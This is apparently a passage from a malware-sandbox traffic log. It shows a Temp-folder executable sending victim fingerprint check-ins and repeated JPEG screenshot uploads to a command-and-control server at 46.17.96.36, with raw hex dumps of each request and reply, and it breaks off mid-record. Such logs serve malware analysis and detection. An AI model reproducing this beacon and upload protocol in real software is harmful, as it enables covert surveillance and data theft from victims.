                                        Aug 29, 2021 22:27:43.265582085 CEST8742OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:43.342721939 CEST8742INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:43 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        8192.168.2.44974346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:11.887317896 CEST1881OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:11.887548923 CEST1881OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:11.887729883 CEST1891OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:11.887804985 CEST1894OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:11.920062065 CEST1899OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:11.920171976 CEST1904OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:11.920303106 CEST1914OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:27:11.920396090 CEST1919OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:11.953212976 CEST1922OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:11.953578949 CEST1924OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:11.953762054 CEST1930OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:27:12.062664032 CEST1988INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:12 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        80192.168.2.44981846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:43.424482107 CEST8743OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----7f467d4e70cc44d532fe453c2d3923e5
                                        Host: 46.17.96.36
                                        Content-Length: 111116
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:43.424577951 CEST8743OUTData Raw: 2d 2d 2d 2d 2d 2d 37 66 34 36 37 64 34 65 37 30 63 63 34 34 64 35 33 32 66 65 34 35 33 63 32 64 33 39 32 33 65 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------7f467d4e70cc44d532fe453c2d3923e5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:43.424782038 CEST8753OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:43.424891949 CEST8756OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:43.457865953 CEST8762OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:43.457917929 CEST8776OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:43.457947016 CEST8781OUTData Raw: 0d c4 f6 d1 79 6a 4f 0a 58 2f 27 d8 67 3f 85 45 e2 7b 74 b5 f8 7d aa 5b a7 dd 8a c1 90 1f 60 98 fe 95 dd 64 9d ba dc 94 db 57 e9 63 e6 ca 28 a2 bd 13 80 87 53 ff 00 90 54 1f f5 dd bf f4 11 58 d5 b5 a9 ff 00 c8 2e 1f fa ee df fa 0a d6 35 03 0a f7
                                        Data Ascii: yjOX/'g?E{t}[`dWc(STX.5/jx%{?_:|Rb{wbB=?JO9us_yK391c2Nxm.$g .rut<(5U^~Zkv>
                                        Aug 29, 2021 22:27:43.489548922 CEST8784OUTData Raw: 9f 77 71 71 6f 32 4d 6e f6 d7 9e 46 d2 a7 38 6f 91 b2 09 c7 4d a7 af 3e 9d 15 6f ca f9 4c 29 db 9b 52 d9 87 42 d3 2d 2c 5f 53 8f 53 b9 96 fa 33 70 a2 da 54 84 43 06 f2 aa 48 64 6d ec 76 93 80 54 01 8e 4e 78 de b3 f0 6d 9c 71 3f db a1 d4 ae 23 5d
                                        Data Ascii: wqqo2MnF8oM>oL)RB-,_SS3pTCHdmvTNxmq?#]I%RXDq(($^`oDHHd1(ciSlo{%%f1mYMW;A+Wk:EO[?i!bmi*G;T*bAW]kZ$Piz
                                        Aug 29, 2021 22:27:43.489605904 CEST8792OUTData Raw: 26 ac 4e 5b 73 ff 00 c0 aa 84 9a 5d e4 67 e6 81 ff 00 2a ea 85 68 cb 79 23 8e 71 a8 b6 4c ce 16 98 ea eb 4e fb 32 0e af f9 0a b0 f6 f3 29 c1 8d 87 e1 51 94 61 d4 56 c9 a7 d4 c9 b9 75 18 21 88 7f 78 d3 82 c6 3a 20 fc 69 40 a2 aa c8 8b b1 72 07 45
                                        Data Ascii: &N[s]g*hy#qLN2)QaVu!x: i@rE1@Ci(!)Rd[zYkzzJhLe1f^|^vPrBQKCv/+Oi^Y(z"'$ Ai6#wn_
                                        Aug 29, 2021 22:27:43.489648104 CEST8805OUTData Raw: 71 1c 32 b2 16 78 22 b8 1b 09 23 6c 88 ae bd 40 e7 0c 33 ef 5a 36 5e 1f 96 ee 25 9e 4b eb 2b 5b 73 62 d7 ed 2c e6 42 12 35 9b c9 39 08 8c 73 bb d0 1e 2a 86 ab 77 05 f6 a3 0c d6 ef be 35 b0 b4 85 8e d2 30 e9 02 23 0e 7d 19 48 ad ab 0d 7f 4c b4 d3
                                        Data Ascii: q2x"#l@3Z6^%K+[sb,B59s*w50#}HLD3K3m27PS>l{V5MIoPsO/mHKs>MC-i"q:FH)U''/\mS.m\/Koe6?;u)cbnvmVP2yW~Rm
                                        Aug 29, 2021 22:27:43.489813089 CEST8821OUTData Raw: cd 3e 9a 13 14 52 d2 0a 5e d5 5d 08 62 77 a5 a4 ef 4e a0 04 c7 34 ea 4a 5a 62 14 50 28 02 96 a8 41 4a 28 ef 4a 28 10 b4 94 e1 46 2a ac 2b 88 29 68 c5 2d 31 05 25 3b 14 a4 51 61 5c 68 a7 01 8a 00 a2 98 00 fb d5 26 6a 31 f7 aa 41 d6 aa 24 c8 3b d3
                                        Data Ascii: >R^]bwN4JZbP(AJ(J(F*+)h-1%;Qa\h&j1A$;ZMj:RO)RwjbR(L@)TP4d<(9'(qXR`CKM-QE 8"ZbaRsK(:iEKMS$)GZ.ismP+RdM k_7
                                        Aug 29, 2021 22:27:43.592315912 CEST8855INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:43 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        81192.168.2.44981946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:43.514678001 CEST8832OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:43.588099957 CEST8855INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:43 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        82192.168.2.44982046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:43.750334024 CEST8856OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:43.824029922 CEST8856INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:43 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        83192.168.2.44982146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:43.825159073 CEST8857OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----2527d6ee36e5d91ced907633b787976c
                                        Host: 46.17.96.36
                                        Content-Length: 110710
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:43.825229883 CEST8857OUTData Raw: 2d 2d 2d 2d 2d 2d 32 35 32 37 64 36 65 65 33 36 65 35 64 39 31 63 65 64 39 30 37 36 33 33 62 37 38 37 39 37 36 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------2527d6ee36e5d91ced907633b787976cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:43.825370073 CEST8867OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:43.825443983 CEST8870OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:43.859816074 CEST8873OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:43.859843969 CEST8878OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:43.860138893 CEST8892OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:43.861829996 CEST8895OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:27:43.895059109 CEST8901OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:43.895150900 CEST8935OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:27:43.895211935 CEST8940OUTData Raw: a0 ec f9 5e bf f6 fc cc e5 f1 9f 86 ed e0 85 56 ec c7 19 dc ab 18 b5 94 18 c2 05 2d b9 76 e5 00 0c a7 2c 00 c1 15 7e cf c4 3a 66 a1 a9 4d 61 69 3b cd 3c 3f 7c ac 0f e5 8e 01 c7 99 b7 61 38 60 78 3d eb 97 b8 f0 6d f5 b5 cd ad ce 99 73 14 f7 06 19
                                        Data Ascii: ^V-v,~:fMai;<?|a8`x=msBYW(~^?7%5uXTL<h'<9rr_?i<~cS+;v_-(Z{zh5vyVB'%\QL4)EBT!RdP)
                                        Aug 29, 2021 22:27:44.003801107 CEST8968INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:43 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        84192.168.2.44982246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:43.973074913 CEST8968OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:44.050615072 CEST8969INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:44 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        85192.168.2.44982346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:44.230236053 CEST8970OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:44.304071903 CEST8983INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:44 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        86192.168.2.44982446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:44.274722099 CEST8970OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----2527d6ee36e5d91ced907633b787976c
